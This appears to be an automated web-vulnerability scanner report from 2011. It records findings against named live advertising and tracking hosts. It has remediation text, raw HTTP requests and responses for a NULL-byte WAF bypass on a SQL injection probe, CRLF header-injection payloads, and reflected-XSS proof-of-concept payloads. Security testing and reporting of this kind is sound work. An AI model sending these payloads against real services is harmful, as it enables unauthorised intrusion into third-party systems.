XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06232011-01

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

Request 1

GET /pixel%00'?nid=themig&can=ffffffffffffffff HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 23 Jun 2011 13:47:17 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 11837
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

Request 2

GET /pixel%00''?nid=themig&can=ffffffffffffffff HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Thu, 23 Jun 2011 13:47:20 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...

2. HTTP header injection previous next
There are 3 instances of this issue:

/adj/fut.gb.tr/news.Internet [REST URL parameter 1]
/adj/sql.home/database [REST URL parameter 1]
/adj/sql.home/general [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f09c%0d%0a48ca2a73d2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f09c%0d%0a48ca2a73d2/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=antivirus;ord=881332705? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f09c
48ca2a73d2/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=antivirus;ord=881332705:
Date: Thu, 23 Jun 2011 13:48:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/sql.home/database [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8578b%0d%0a97541f8cd5d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8578b%0d%0a97541f8cd5d/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;dcopt=ist;sz=468x60,728x90;tile=1;pos=728_1;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8578b
97541f8cd5d/sql.home/database;abr=!webtv;page=/article/sql-server/hardening sql server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;dcopt=ist;sz=468x60,728x90;tile=1;pos=728_1;ord=79932:
Date: Thu, 23 Jun 2011 13:44:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/sql.home/general [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/general

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 463d2%0d%0aca985ddeaf1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /463d2%0d%0aca985ddeaf1/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;dcopt=ist;sz=468x60,728x90;tile=1;pos=728_1;ord=38875 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/categories/category/t-sql-powershell-scripting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/463d2
ca985ddeaf1/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;dcopt=ist;sz=468x60,728x90;tile=1;pos=728_1;ord=38875:
Date: Thu, 23 Jun 2011 14:18:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected) previous next
There are 39 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet [name of an arbitrarily supplied request parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.z5x.net/st [name of an arbitrarily supplied request parameter]
http://data.inskinmedia.com/trackports/rep/base/track.php [callback parameter]
http://data.inskinmedia.com/trackports/rep/base/track.php [type parameter]
http://delivery.steelhousemedia.com/serve [advid parameter]
http://delivery.steelhousemedia.com/serve [aid parameter]
http://delivery.steelhousemedia.com/serve [cb parameter]
http://delivery.steelhousemedia.com/serve [cgid parameter]
http://delivery.steelhousemedia.com/serve [cid parameter]
http://delivery.steelhousemedia.com/serve [ck parameter]
http://delivery.steelhousemedia.com/serve [eid parameter]
http://delivery.steelhousemedia.com/serve [guid parameter]
http://delivery.steelhousemedia.com/serve [ms parameter]
http://delivery.steelhousemedia.com/serve [name of an arbitrarily supplied request parameter]
http://delivery.steelhousemedia.com/serve [pp parameter]
http://delivery.steelhousemedia.com/serve [segid parameter]
http://delivery.steelhousemedia.com/serve [sh_ref parameter]
http://delivery.steelhousemedia.com/serve [sh_rid parameter]
http://ib.adnxs.com/ab [ccd parameter]
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpck parameter]
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpck parameter]
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpvc parameter]
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpvc parameter]
http://js.revsci.net/gateway/gw.js [bpid parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://license.icopyright.net/rights/offer.act [urs parameter]
http://license.icopyright.net/rights/offer.act [urt parameter]
http://license.icopyright.net/rights/postPdfServiceGroup.act [urs parameter]
http://license.icopyright.net/rights/postPdfServiceGroup.act [urt parameter]
http://license.icopyright.net/rights/postServiceGroup.act [urs parameter]
http://license.icopyright.net/rights/postServiceGroup.act [urt parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 31988<script>alert(1)</script>6fc881e098b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=48031988<script>alert(1)</script>6fc881e098b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 48031988<script>alert(1)</script>6fc881e098b-SM=adver_06-23-2011-13-44-50; expires=Sun, 26-Jun-2011 13:44:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 48031988<script>alert(1)</script>6fc881e098b-VT=adver_06-23-2011-13-44-50_7154747351308836690; expires=Tue, 21-Jun-2016 13:44:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 48031988<script>alert(1)</script>6fc881e098b-nUID=adver_7154747351308836690; expires=Thu, 23-Jun-2011 13:59:50 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='48031988<script>alert(1)</script>6fc881e098b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='7154747351308836690';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this
...[SNIP]...

3.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b7d8e<script>alert(1)</script>8015eacadd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverb7d8e<script>alert(1)</script>8015eacadd8&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687ZZZZadverb7d8e%3Cscript%3Ealert%281%29%3C%2Fscript%3E8015eacadd8_06-23-2011-13-44-50_6947430081308836690; expires=Tue, 21-Jun-2016 13:44:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_16385998991308836687ZZZZadverb7d8e%3Cscript%3Ealert%281%29%3C%2Fscript%3E8015eacadd8_6947430081308836690; expires=Thu, 23-Jun-2011 13:59:50 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverb7d8e<script>alert(1)</script>8015eacadd8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='6947430081308836690';th
...[SNIP]...

3.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d672e<script>alert(1)</script>31559a4649a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d672e<script>alert(1)</script>31559a4649a&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:54 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:54 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-54_7554042901308836694; expires=Tue, 21-Jun-2016 13:44:54 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7554042901308836694; expires=Thu, 23-Jun-2011 13:59:54 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='7554042901308836694';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d672e<script>alert(1)</script>31559a4649a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 2633d<script>alert(1)</script>7cf1abfd67e was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=2633d<script>alert(1)</script>7cf1abfd67e&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:52 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:52 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-52_4546826821308836692; expires=Tue, 21-Jun-2016 13:44:52 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_4546826821308836692; expires=Thu, 23-Jun-2011 13:59:52 GMT; path=/; domain=c3metrics.com
Content-Length: 6690
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
d='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='4546826821308836692';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='2633d<script>alert(1)</script>7cf1abfd67e';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

3.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 415a0<script>alert(1)</script>af6008a9ab1 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72415a0<script>alert(1)</script>af6008a9ab1&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:52 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Thu, 26-Sep-2019 20:44:52 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-52_10557095211308836692; expires=Tue, 21-Jun-2016 13:44:52 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10557095211308836692; expires=Thu, 23-Jun-2011 13:59:52 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
